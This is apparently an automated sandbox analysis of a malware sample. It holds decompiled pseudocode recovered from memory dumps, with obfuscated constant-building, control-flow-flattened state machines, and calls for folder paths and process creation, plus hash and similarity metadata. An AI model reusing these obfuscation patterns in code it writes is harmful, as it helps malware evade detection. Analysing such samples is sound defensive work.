                                          				signed int _v1204;
                                          				signed int _v1208;
                                          				signed int _v1212;
                                          				signed int _v1216;
                                          				void* _t365;
                                          				void* _t366;
                                          				intOrPtr _t368;
                                          				signed int _t376;
                                          				intOrPtr* _t378;
                                          				void* _t379;
                                          				signed int _t384;
                                          				intOrPtr _t385;
                                          				intOrPtr* _t386;
                                          				signed int _t387;
                                          				signed int _t388;
                                          				signed int _t389;
                                          				signed int _t390;
                                          				signed int _t391;
                                          				void* _t392;
                                          				void* _t399;
                                          				void* _t405;
                                          				intOrPtr _t419;
                                          				void* _t427;
                                          				signed int* _t432;
                                          
                                          				_t432 =  &_v1216;
                                          				_v1048 = 0x446f36;
                                          				_v1044 = 0;
                                          				_v1168 = 0x4c2;
                                          				_v1168 = _v1168 + 0x4422;
                                          				_v1168 = _v1168 << 0xe;
                                          				_v1168 = _v1168 ^ 0x12390029;
                                          				_v1108 = 0xe6e3;
                                          				_v1108 = _v1108 << 7;
                                          				_v1108 = _v1108 ^ 0x80737181;
                                          				_v1140 = 0x5a14;
                                          				_v1140 = _v1140 + 0xffff6ad9;
                                          				_v1140 = _v1140 + 0x3f04;
                                          				_v1140 = _v1140 ^ 0x000003f3;
                                          				_v1152 = 0xde22;
                                          				_v1056 = 0;
                                          				_t427 = 0x1cf5a099;
                                          				_t387 = 0xc;
                                          				_v1152 = _v1152 / _t387;
                                          				_v1152 = _v1152 + 0x1888;
                                          				_v1152 = _v1152 ^ 0x00005d3c;
                                          				_v1072 = 0x75ae;
                                          				_t388 = 0x55;
                                          				_v1072 = _v1072 * 0x39;
                                          				_v1072 = _v1072 ^ 0x001a1469;
                                          				_v1160 = 0x6360;
                                          				_v1160 = _v1160 << 0xa;
                                          				_v1160 = _v1160 >> 0xe;
                                          				_v1160 = _v1160 ^ 0x00005ec5;
                                          				_v1204 = 0x5583;
                                          				_v1204 = _v1204 ^ 0x85366cb5;
                                          				_v1204 = _v1204 | 0x8d22480f;
                                          				_v1204 = _v1204 + 0xffffa345;
                                          				_v1204 = _v1204 ^ 0x8d362c42;
                                          				_v1076 = 0x4501;
                                          				_v1076 = _v1076 ^ 0x7eb858e4;
                                          				_v1076 = _v1076 ^ 0x7eb84390;
                                          				_v1176 = 0x178a;
                                          				_v1176 = _v1176 >> 0xe;
                                          				_v1176 = _v1176 * 0xb;
                                          				_v1176 = _v1176 ^ 0x00005407;
                                          				_v1196 = 0x1155;
                                          				_v1196 = _v1196 << 0x10;
                                          				_v1196 = _v1196 ^ 0x99db21f3;
                                          				_v1196 = _v1196 << 8;
                                          				_v1196 = _v1196 ^ 0x8e21cf72;
                                          				_v1096 = 0x9447;
                                          				_v1096 = _v1096 + 0xfffff759;
                                          				_v1096 = _v1096 ^ 0x0000f307;
                                          				_v1136 = 0x5f84;
                                          				_v1136 = _v1136 | 0xcddc780f;
                                          				_v1136 = _v1136 >> 5;
                                          				_v1136 = _v1136 ^ 0x066ef8af;
                                          				_v1104 = 0x8d89;
                                          				_v1104 = _v1104 + 0xffff49e8;
                                          				_v1104 = _v1104 ^ 0xffff9178;
                                          				_v1060 = 0xefb9;
                                          				_v1060 = _v1060 + 0xc1e0;
                                          				_v1060 = _v1060 ^ 0x0001802f;
                                          				_v1088 = 0x4e92;
                                          				_v1088 = _v1088 / _t388;
                                          				_v1088 = _v1088 ^ 0x00003d65;
                                          				_v1180 = 0x8957;
                                          				_v1180 = _v1180 ^ 0x92844c79;
                                          				_v1180 = _v1180 >> 0xd;
                                          				_v1180 = _v1180 + 0x6937;
                                          				_v1180 = _v1180 ^ 0x0004ca08;
                                          				_v1188 = 0xa977;
                                          				_v1188 = _v1188 + 0xffff4939;
                                          				_t389 = 0x2a;
                                          				_v1188 = _v1188 / _t389;
                                          				_v1188 = _v1188 + 0xff8b;
                                          				_v1188 = _v1188 ^ 0x06195dc5;
                                          				_v1184 = 0xd80a;
                                          				_v1184 = _v1184 << 0xd;
                                          				_v1184 = _v1184 | 0x4fc46678;
                                          				_v1184 = _v1184 + 0xffff2565;
                                          				_v1184 = _v1184 ^ 0x5fc4ec42;
                                          				_v1144 = 0xea63;
                                          				_v1144 = _v1144 >> 0xa;
                                          				_v1144 = _v1144 + 0xffff7a6a;
                                          				_v1144 = _v1144 ^ 0xffff3b56;
                                          				_v1064 = 0xbe27;
                                          				_v1064 = _v1064 << 0xc;
                                          				_v1064 = _v1064 ^ 0x0be2654a;
                                          				_v1100 = 0x1945;
                                          				_v1100 = _v1100 ^ 0xac55a11c;
                                          				_v1100 = _v1100 ^ 0xac55a0be;
                                          				_v1156 = 0x9792;
                                          				_v1156 = _v1156 << 3;
                                          				_v1156 = _v1156 + 0xffff9949;
                                          				_v1156 = _v1156 ^ 0x00042150;
                                          				_v1124 = 0x4510;
                                          				_v1124 = _v1124 + 0xffff8613;
                                          				_v1124 = _v1124 | 0x934ed599;
                                          				_v1124 = _v1124 ^ 0xffffb057;
                                          				_v1208 = 0xd7d3;
                                          				_t390 = 0x4a;
                                          				_v1208 = _v1208 * 0x29;
                                          				_v1208 = _v1208 << 7;
                                          				_v1208 = _v1208 | 0x9b57b5c9;
                                          				_v1208 = _v1208 ^ 0x9b5f9b7a;
                                          				_v1164 = 0x3cc8;
                                          				_v1164 = _v1164 + 0xffff7a64;
                                          				_v1164 = _v1164 + 0xffff31bf;
                                          				_v1164 = _v1164 ^ 0xfffea90e;
                                          				_v1092 = 0xe652;
                                          				_v1092 = _v1092 << 0xf;
                                          				_v1092 = _v1092 ^ 0x732967ec;
                                          				_v1200 = 0xc0e1;
                                          				_v1200 = _v1200 ^ 0xc04a3a1a;
                                          				_v1200 = _v1200 | 0x7efbebea;
                                          				_v1200 = _v1200 ^ 0xfefb9216;
                                          				_v1192 = 0x2d8c;
                                          				_v1192 = _v1192 >> 7;
                                          				_v1192 = _v1192 ^ 0x302961fe;
                                          				_v1192 = _v1192 << 0xf;
                                          				_v1192 = _v1192 ^ 0xb0d2939c;
                                          				_v1132 = 0xbcbe;
                                          				_v1132 = _v1132 | 0x9a03aa26;
                                          				_v1132 = _v1132 << 4;
                                          				_v1132 = _v1132 ^ 0xa03bfed3;
                                          				_v1068 = 0x5b9d;
                                          				_v1068 = _v1068 / _t390;
                                          				_v1068 = _v1068 ^ 0x00000144;
                                          				_v1172 = 0x2743;
                                          				_v1172 = _v1172 >> 9;
                                          				_v1172 = _v1172 + 0x7fd0;
                                          				_v1172 = _v1172 ^ 0x00002a87;
                                          				_v1116 = 0x6969;
                                          				_t391 = 0x76;
                                          				_v1116 = _v1116 / _t391;
                                          				_v1116 = _v1116 << 0xa;
                                          				_v1116 = _v1116 ^ 0x0003c98c;
                                          				_v1212 = 0xb804;
                                          				_v1212 = _v1212 + 0xffff4ff5;
                                          				_v1212 = _v1212 << 0xd;
                                          				_v1212 = _v1212 + 0x7e88;
                                          				_v1212 = _v1212 ^ 0x00ffdfa3;
                                          				_v1084 = 0x6753;
                                          				_v1084 = _v1084 | 0x97d0336a;
                                          				_v1084 = _v1084 ^ 0x97d00d97;
                                          				_v1148 = 0xef82;
                                          				_v1148 = _v1148 >> 2;
                                          				_v1148 = _v1148 << 2;
                                          				_v1148 = _v1148 ^ 0x0000cb2e;
                                          				_v1112 = 0x5852;
                                          				_v1112 = _v1112 >> 7;
                                          				_v1112 = _v1112 ^ 0xfa80e3bf;
                                          				_v1112 = _v1112 ^ 0xfa8084b8;
                                          				_v1120 = 0x62fa;
                                          				_v1120 = _v1120 >> 0xa;
                                          				_v1120 = _v1120 << 3;
                                          				_v1120 = _v1120 ^ 0x000065d7;
                                          				_t384 = _v1056;
                                          				_v1128 = 0x8139;
                                          				_v1128 = _v1128 + 0xffff21ec;
                                          				_v1128 = _v1128 ^ 0xad93553f;
                                          				_v1128 = _v1128 ^ 0x526c8c2f;
                                          				_v1080 = 0x16f9;
                                          				_v1080 = _v1080 + 0xffffafc8;
                                          				_v1080 = _v1080 ^ 0xffff87da;
                                          				_v1216 = 0xd107;
                                          				_v1216 = _v1216 << 0xa;
                                          				_v1216 = _v1216 >> 0xb;
                                          				_v1216 = _v1216 | 0x40b78e0e;
                                          				_v1216 = _v1216 ^ 0x40b7ee8e;
                                          				while(1) {
                                          					L1:
                                          					_t392 = 0x5c;
                                          					while(1) {
                                          						L2:
                                          						_t365 = 0x201e73d8;
                                          						do {
                                          							L3:
                                          							if(_t427 == 0xb9056ba) {
                                          								_push(_v1176);
                                          								_t366 = E006D889D(0x6dc930, _v1076, __eflags);
                                          								_t368 =  *0x6dca2c; // 0x248300
                                          								__eflags = _t368 + 0x230;
                                          								_t419 =  *0x6dca2c; // 0x248300
                                          								E006C29E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
                                          								E006D2025(_v1088, _t366, _v1180, _v1188);
                                          								_t432 =  &(_t432[0xc]);
                                          								_t427 = 0x176c6394;
                                          								goto L17;
                                          							} else {
                                          								if(_t427 == 0x176c6394) {
                                          									_t385 =  *0x6dca2c; // 0x248300
                                          									_t386 = _t385 + 0x230;
                                          									while(1) {
                                          										__eflags =  *_t386 - _t392;
                                          										if(__eflags == 0) {
                                          											break;
                                          										}
                                          										_t386 = _t386 + 2;
                                          										__eflags = _t386;
                                          									}
                                          									_t384 = _t386 + 2;
                                          									_t427 = 0x2c3250cc;
                                          									goto L2;
                                          								} else {
                                          									if(_t427 == 0x1cf5a099) {
                                          										_push(_t392);
                                          										_push(_t392);
                                          										E006CC6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
                                          										_t432 =  &(_t432[7]);
                                          										_t427 = 0xb9056ba;
                                          										goto L1;
                                          									} else {
                                          										if(_t427 == 0x1e86e44b) {
                                          											E006C65A2(_v1052, _v1112, _v1120, _v1128, _v1080);
                                          										} else {
                                          											if(_t427 == _t365) {
                                          												_t376 = E006D0ADC( &_v1040, _v1132, _v1068);
                                          												_pop(_t399);
                                          												_t378 = E006C1AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
                                          												_t432 =  &(_t432[9]);
                                          												__eflags = _t378;
                                          												_t427 = 0x1e86e44b;
                                          												_v1056 = 0 | __eflags == 0x00000000;
                                          												while(1) {
                                          													L1:
                                          													_t392 = 0x5c;
                                          													L2:
                                          													_t365 = 0x201e73d8;
                                          													goto L3;
                                          												}
                                          											} else {
                                          												_t440 = _t427 - 0x2c3250cc;
                                          												if(_t427 == 0x2c3250cc) {
                                          													_push(_v1144);
                                          													_t379 = E006D889D(0x6dc9d0, _v1184, _t440);
                                          													_pop(_t405);
                                          													E006D3EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x6dc9d0, _v1124, _v1208, 0x6dc9d0, _v1164, 0x6dc9d0, _v1140, _v1108,  &_v1052);
                                          													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
                                          													E006D2025(_v1092, _t379, _v1200, _v1192);
                                          													_t432 =  &(_t432[0xf]);
                                          													L17:
                                          													_t365 = 0x201e73d8;
                                          													_t392 = 0x5c;
                                          												}
                                          												goto L18;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L21:
                                          							return _v1056;
                                          							L18:
                                          						} while (_t427 != 0x22b0460c);
                                          						goto L21;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                          • API String ID: 1514166925-3192994148
                                          • Opcode ID: 617dfba3fe9edc66024e642cd308fa61ae0c93a83c0ca6495c5f99915abad132
                                          • Instruction ID: 0bed8e3ee2524815b5e3d0a23703d21d2b0c54ad2d76da0da65ca1244418c4d0
                                          • Opcode Fuzzy Hash: 617dfba3fe9edc66024e642cd308fa61ae0c93a83c0ca6495c5f99915abad132
                                          • Instruction Fuzzy Hash: 3E0214725097819FE3A5CF61C84AA5BBBE2FBC5748F10890DF1D9862A0D7B58909CF07
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006CBB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                          				intOrPtr _v60;
                                          				char _v68;
                                          				char _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				signed int _v128;
                                          				signed int _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				char _t284;
                                          				signed int _t317;
                                          				void* _t322;
                                          				signed int _t349;
                                          				signed int _t350;
                                          				signed int _t351;
                                          				signed int _t352;
                                          				signed int _t353;
                                          				signed int _t354;
                                          				signed int _t355;
                                          				intOrPtr _t357;
                                          				signed int* _t360;
                                          
                                          				_push(_a28);
                                          				_push(0);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(0);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				_t284 = E006C602B(0);
                                          				_v72 = _t284;
                                          				_t357 = _t284;
                                          				_v176 = 0x3707;
                                          				_t360 =  &(( &_v188)[9]);
                                          				_v176 = _v176 << 3;
                                          				_t322 = 0x3701c77e;
                                          				_t349 = 0x1b;
                                          				_v176 = _v176 * 0x3b;
                                          				_v176 = _v176 ^ 0x9e3c13fc;
                                          				_v176 = _v176 ^ 0x9e596314;
                                          				_v152 = 0x78a7;
                                          				_v152 = _v152 + 0x292e;
                                          				_v152 = _v152 << 3;
                                          				_v152 = _v152 ^ 0x00050e88;
                                          				_v180 = 0xd511;
                                          				_v180 = _v180 ^ 0x1d80f702;
                                          				_v180 = _v180 << 0xe;
                                          				_v180 = _v180 ^ 0xe181230f;
                                          				_v180 = _v180 ^ 0xe905cae0;
                                          				_v92 = 0xc43e;
                                          				_v92 = _v92 + 0xffff1ae3;
                                          				_v92 = _v92 ^ 0xffffb82c;
                                          				_v104 = 0x4365;
                                          				_v104 = _v104 >> 5;
                                          				_v104 = _v104 >> 9;
                                          				_v104 = _v104 ^ 0x000066ec;
                                          				_v172 = 0xf4f1;
                                          				_v172 = _v172 + 0x10b4;
                                          				_v172 = _v172 + 0xffffc378;
                                          				_v172 = _v172 / _t349;
                                          				_v172 = _v172 ^ 0x000074e7;
                                          				_v116 = 0x37b8;
                                          				_v116 = _v116 + 0xffff57e4;
                                          				_v116 = _v116 + 0xb626;
                                          				_v116 = _v116 ^ 0x0000140c;
                                          				_v144 = 0xb795;
                                          				_t350 = 0x49;
                                          				_v144 = _v144 * 0x50;
                                          				_v144 = _v144 / _t350;
                                          				_v144 = _v144 ^ 0x000091bc;
                                          				_v76 = 0x1dd7;
                                          				_t351 = 0x1c;
                                          				_v76 = _v76 * 0x75;
                                          				_v76 = _v76 ^ 0x000d9fef;
                                          				_v108 = 0xced7;
                                          				_v108 = _v108 >> 5;
                                          				_v108 = _v108 / _t351;
                                          				_v108 = _v108 ^ 0x00005a08;
                                          				_v136 = 0x2b88;
                                          				_v136 = _v136 ^ 0x78d809e4;
                                          				_v136 = _v136 >> 0xe;
                                          				_v136 = _v136 ^ 0x0001f73d;
                                          				_v164 = 0x766d;
                                          				_v164 = _v164 >> 1;
                                          				_v164 = _v164 + 0xffffabb8;
                                          				_t352 = 0x72;
                                          				_v164 = _v164 * 0x5c;
                                          				_v164 = _v164 ^ 0xfff6cd9c;
                                          				_v168 = 0x718b;
                                          				_v168 = _v168 ^ 0xcaa0facc;
                                          				_v168 = _v168 ^ 0xed5841e4;
                                          				_t112 =  &_v168; // 0xed5841e4
                                          				_v168 =  *_t112 * 0x1f;
                                          				_v168 = _v168 ^ 0xd720c943;
                                          				_v100 = 0x3093;
                                          				_v100 = _v100 << 8;
                                          				_v100 = _v100 * 0x6e;
                                          				_v100 = _v100 ^ 0x14df3334;
                                          				_v80 = 0xaa77;
                                          				_v80 = _v80 | 0xec49ccd9;
                                          				_v80 = _v80 ^ 0xec49f00b;
                                          				_v184 = 0x6ab1;
                                          				_v184 = _v184 << 0x10;
                                          				_v184 = _v184 + 0x7c9;
                                          				_v184 = _v184 + 0xb8a8;
                                          				_v184 = _v184 ^ 0x6ab1ec4b;
                                          				_v96 = 0xf4af;
                                          				_v96 = _v96 * 0x3a;
                                          				_v96 = _v96 >> 9;
                                          				_v96 = _v96 ^ 0x00007d4d;
                                          				_v188 = 0xb63a;
                                          				_v188 = _v188 ^ 0x365cf355;
                                          				_v188 = _v188 << 2;
                                          				_v188 = _v188 + 0xd6ce;
                                          				_v188 = _v188 ^ 0xd971d569;
                                          				_v120 = 0xab3a;
                                          				_v120 = _v120 * 0x32;
                                          				_v120 = _v120 / _t352;
                                          				_v120 = _v120 ^ 0x00002a91;
                                          				_v156 = 0xadc6;
                                          				_v156 = _v156 >> 9;
                                          				_v156 = _v156 + 0xffff5d43;
                                          				_v156 = _v156 ^ 0xffff767e;
                                          				_v128 = 0x4e26;
                                          				_t353 = 0x54;
                                          				_v128 = _v128 / _t353;
                                          				_v128 = _v128 ^ 0xbd5b2ebf;
                                          				_v128 = _v128 ^ 0xbd5b3d92;
                                          				_v112 = 0x5bd4;
                                          				_v112 = _v112 | 0xfffbefdf;
                                          				_v112 = _v112 ^ 0xfffb9ace;
                                          				_v88 = 0x9c25;
                                          				_v88 = _v88 | 0xd782555b;
                                          				_v88 = _v88 ^ 0xd782aa4a;
                                          				_v140 = 0x1cfa;
                                          				_v140 = _v140 >> 1;
                                          				_t354 = 0x5d;
                                          				_v140 = _v140 / _t354;
                                          				_v140 = _v140 ^ 0x0000306c;
                                          				_v148 = 0xedd7;
                                          				_v148 = _v148 ^ 0xabf54283;
                                          				_t355 = 0x30;
                                          				_v148 = _v148 / _t355;
                                          				_v148 = _v148 ^ 0x03952150;
                                          				_v124 = 0xb354;
                                          				_v124 = _v124 + 0xffffd7c7;
                                          				_v124 = _v124 + 0x3a29;
                                          				_v124 = _v124 ^ 0x0000d052;
                                          				_v132 = 0x3532;
                                          				_v132 = _v132 >> 0xb;
                                          				_v132 = _v132 | 0xce8e7aaf;
                                          				_v132 = _v132 ^ 0xce8e32c4;
                                          				_v160 = 0x7409;
                                          				_v160 = _v160 | 0x6d9a42b1;
                                          				_v160 = _v160 + 0xffff6faf;
                                          				_v160 = _v160 >> 2;
                                          				_v160 = _v160 ^ 0x1b6641d5;
                                          				_v84 = 0xb2d5;
                                          				_v84 = _v84 * 0x47;
                                          				_v84 = _v84 ^ 0x0031fe78;
                                          				do {
                                          					while(_t322 != 0x94ffda2) {
                                          						if(_t322 == 0x11e75ef4) {
                                          							_t317 = E006C2833(_v180,  &_v72, _v92, _a8, _v104, _v172);
                                          							_t360 =  &(_t360[5]);
                                          							__eflags = _t317;
                                          							if(_t317 != 0) {
                                          								_t322 = 0x94ffda2;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t322 == 0x3336903c) {
                                          								E006D337D(_v124, _v72, _v132, _v160, _v84);
                                          							} else {
                                          								if(_t322 != 0x3701c77e) {
                                          									goto L9;
                                          								} else {
                                          									_t322 = 0x11e75ef4;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						L12:
                                          						return _t357;
                                          					}
                                          					E006D93A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
                                          					_push(_v164);
                                          					_v68 = 0x44;
                                          					_v60 = E006D889D(0x6dc000, _v136, __eflags);
                                          					__eflags = _v152 | _v176;
                                          					_t357 = E006C7AB1(_v168, _a16, 0x6dc000, 0x6dc000, _v152 | _v176, _v100, 0x6dc000, 0x6dc000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
                                          					E006D2025(_v88, _v60, _v140, _v148);
                                          					_t360 =  &(_t360[0x1a]);
                                          					_t322 = 0x3336903c;
                                          					L9:
                                          					__eflags = _t322 - 0x294b0e13;
                                          				} while (_t322 != 0x294b0e13);
                                          				goto L12;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                          • API String ID: 0-3778435269
                                          • Opcode ID: 55ebb3b9baa24caffefcede93f45f3b0479c54256cd31112cf568793c1d9f504
                                          • Instruction ID: 423c1d9d319408e22baa3363abae5c93fea41e97c3493c6a39663836240cb43a
                                          • Opcode Fuzzy Hash: 55ebb3b9baa24caffefcede93f45f3b0479c54256cd31112cf568793c1d9f504
                                          • Instruction Fuzzy Hash: 28D100715083819FE364CF65C889A5FFBE2BBC4358F10891DF29A96260D7B58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006D8F49() {
                                          				char _v520;
                                          				char _v1040;
                                          				signed int _v1044;
                                          				intOrPtr _v1048;
                                          				signed int _v1052;
                                          				signed int _v1056;
                                          				signed int _v1060;
                                          				signed int _v1064;
                                          				signed int _v1068;
                                          				signed int _v1072;
                                          				signed int _v1076;
                                          				signed int _v1080;
                                          				signed int _v1084;
                                          				signed int _v1088;
                                          				signed int _v1092;
                                          				signed int _v1096;
                                          				signed int _v1100;
                                          				signed int _v1104;
                                          				signed int _v1108;
                                          				signed int _v1112;
                                          				signed int _v1116;
                                          				signed int _v1120;
                                          				signed int _v1124;
                                          				signed int _v1128;
                                          				signed int _v1132;
                                          				signed int _v1136;
                                          				signed int _v1140;
                                          				signed int _v1144;
                                          				void* _t238;
                                          				void* _t239;
                                          				void* _t240;
                                          				void* _t245;
                                          				signed int _t249;
                                          				signed int _t250;
                                          				signed int _t251;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				intOrPtr _t258;
                                          				void* _t264;
                                          				intOrPtr _t282;
                                          				void* _t286;
                                          				signed int* _t290;
                                          
                                          				_t290 =  &_v1144;
                                          				_v1044 = _v1044 & 0x00000000;
                                          				_v1048 = 0x4ebe6;
                                          				_v1128 = 0x778f;
                                          				_v1128 = _v1128 | 0xa1323825;
                                          				_t249 = 0x13;
                                          				_v1128 = _v1128 / _t249;
                                          				_v1128 = _v1128 << 2;
                                          				_t286 = 0x35c963e4;
                                          				_v1128 = _v1128 ^ 0x21ef9208;
                                          				_v1052 = 0x4cd;
                                          				_v1052 = _v1052 | 0x68cff677;
                                          				_v1052 = _v1052 ^ 0x68cf93fd;
                                          				_v1092 = 0x77ae;
                                          				_v1092 = _v1092 >> 0xa;
                                          				_v1092 = _v1092 ^ 0x00005fc7;
                                          				_v1060 = 0x2f45;
                                          				_v1060 = _v1060 | 0xa1a9613d;
                                          				_v1060 = _v1060 ^ 0xa1a96f30;
                                          				_v1096 = 0x6d0d;
                                          				_v1096 = _v1096 << 2;
                                          				_v1096 = _v1096 | 0xf85e23e8;
                                          				_v1096 = _v1096 ^ 0xf85f94d5;
                                          				_v1136 = 0xe906;
                                          				_t250 = 0x4b;
                                          				_v1136 = _v1136 * 0x76;
                                          				_v1136 = _v1136 + 0x8e3a;
                                          				_v1136 = _v1136 << 8;
                                          				_v1136 = _v1136 ^ 0x6bf6f1e6;
                                          				_v1104 = 0x5e2e;
                                          				_v1104 = _v1104 >> 0xd;
                                          				_v1104 = _v1104 * 0x2c;
                                          				_v1104 = _v1104 ^ 0x0000496b;
                                          				_v1144 = 0xf2e9;
                                          				_v1144 = _v1144 + 0xd50c;
                                          				_v1144 = _v1144 / _t250;
                                          				_v1144 = _v1144 ^ 0x9fddb036;
                                          				_v1144 = _v1144 ^ 0x9fdde12f;
                                          				_v1108 = 0x6902;
                                          				_v1108 = _v1108 | 0xfbe10d26;
                                          				_v1108 = _v1108 * 0x44;
                                          				_v1108 = _v1108 ^ 0xe7e09cc2;
                                          				_v1120 = 0xf3f1;
                                          				_v1120 = _v1120 + 0xffff8a4f;
                                          				_v1120 = _v1120 >> 6;
                                          				_v1120 = _v1120 * 0x67;
                                          				_v1120 = _v1120 ^ 0x0000b01d;
                                          				_v1088 = 0xb368;
                                          				_v1088 = _v1088 + 0x9734;
                                          				_v1088 = _v1088 ^ 0x00010c20;
                                          				_v1076 = 0x650d;
                                          				_v1076 = _v1076 ^ 0x0544b8d8;
                                          				_v1076 = _v1076 ^ 0x054483f2;
                                          				_v1056 = 0xabff;
                                          				_v1056 = _v1056 ^ 0x935518d0;
                                          				_v1056 = _v1056 ^ 0x9355abf6;
                                          				_v1068 = 0xb772;
                                          				_v1068 = _v1068 << 2;
                                          				_v1068 = _v1068 ^ 0x00028ed1;
                                          				_v1124 = 0xbc7e;
                                          				_v1124 = _v1124 * 0x39;
                                          				_v1124 = _v1124 + 0x3dff;
                                          				_v1124 = _v1124 ^ 0x966a7207;
                                          				_v1124 = _v1124 ^ 0x9640526c;
                                          				_v1132 = 0xba5f;
                                          				_v1132 = _v1132 << 0xb;
                                          				_v1132 = _v1132 << 5;
                                          				_t251 = 0x75;
                                          				_v1132 = _v1132 / _t251;
                                          				_v1132 = _v1132 ^ 0x0197c6fa;
                                          				_v1140 = 0x5fea;
                                          				_t252 = 0x3c;
                                          				_v1140 = _v1140 * 0xa;
                                          				_v1140 = _v1140 * 0x2d;
                                          				_v1140 = _v1140 >> 2;
                                          				_v1140 = _v1140 ^ 0x002a725f;
                                          				_v1100 = 0x79ec;
                                          				_v1100 = _v1100 << 8;
                                          				_v1100 = _v1100 ^ 0x69f808d7;
                                          				_v1100 = _v1100 ^ 0x69818172;
                                          				_v1084 = 0xd5eb;
                                          				_v1084 = _v1084 ^ 0xb139babe;
                                          				_v1084 = _v1084 ^ 0xb1392951;
                                          				_v1072 = 0x4dbe;
                                          				_v1072 = _v1072 ^ 0x00003bef;
                                          				_v1080 = 0x7ef4;
                                          				_v1080 = _v1080 / _t252;
                                          				_v1080 = _v1080 ^ 0x00000c75;
                                          				_v1112 = 0xcb8d;
                                          				_v1112 = _v1112 + 0x5361;
                                          				_v1112 = _v1112 + 0xffffff0c;
                                          				_v1112 = _v1112 ^ 0x00015b8c;
                                          				_v1064 = 0xba20;
                                          				_v1064 = _v1064 ^ 0x3b22f3f3;
                                          				_v1064 = _v1064 ^ 0x3b2222af;
                                          				_v1116 = 0xa287;
                                          				_v1116 = _v1116 + 0x9065;
                                          				_t253 = 0x5f;
                                          				_v1116 = _v1116 / _t253;
                                          				_v1116 = _v1116 + 0xffff8b94;
                                          				_v1116 = _v1116 ^ 0xffffc056;
                                          				_t238 = E006D85BA(_t253);
                                          				do {
                                          					while(_t286 != 0x2b67e243) {
                                          						if(_t286 == 0x35036a43) {
                                          							_push( &_v1040);
                                          							_push( &_v520);
                                          							return E006C7B63(_v1064, _v1116, __eflags);
                                          						}
                                          						if(_t286 == 0x35c963e4) {
                                          							_t286 = 0x39b3b44d;
                                          							continue;
                                          						}
                                          						_t295 = _t286 - 0x39b3b44d;
                                          						if(_t286 != 0x39b3b44d) {
                                          							goto L8;
                                          						}
                                          						_push(_v1092);
                                          						_t245 = E006D889D(0x6dc9b0, _v1052, _t295);
                                          						_pop(_t264);
                                          						_t282 =  *0x6dca2c; // 0x248300
                                          						_t196 = _t282 + 0x230; // 0x710050
                                          						E006CC680(_t196, _v1096, _v1136, _t264, _v1104,  *0x6dca2c, _t245,  &_v520);
                                          						_t238 = E006D2025(_v1144, _t245, _v1108, _v1120);
                                          						_t290 =  &(_t290[9]);
                                          						_t286 = 0x2b67e243;
                                          					}
                                          					_push(_v1076);
                                          					_t239 = E006D889D(0x6dc980, _v1088, __eflags);
                                          					_t240 = E006D8C8F(_v1056);
                                          					_t258 =  *0x6dca2c; // 0x248300
                                          					_t210 = _t258 + 0x230; // 0x248530
                                          					E006C29E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
                                          					_t238 = E006D2025(_v1072, _t239, _v1080, _v1112);
                                          					_t290 =  &(_t290[0xc]);
                                          					_t286 = 0x35036a43;
                                          					L8:
                                          					__eflags = _t286 - 0x38d0088b;
                                          				} while (__eflags != 0);
                                          				return _t238;
                                          			}
                                          0x00000000
                                          0x00000000
                                          0x006d9296
                                          0x006d92a3
                                          0x006d92a8
                                          0x006d92c7
                                          0x006d92d4
                                          0x006d92da
                                          0x006d92ed
                                          0x006d92f2
                                          0x006d92f5
                                          0x006d92f5
                                          0x006d9303
                                          0x006d9310
                                          0x006d931f
                                          0x006d9341
                                          0x006d934d
                                          0x006d9353
                                          0x006d9369
                                          0x006d936e
                                          0x006d9371
                                          0x006d9373
                                          0x006d9373
                                          0x006d9373
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
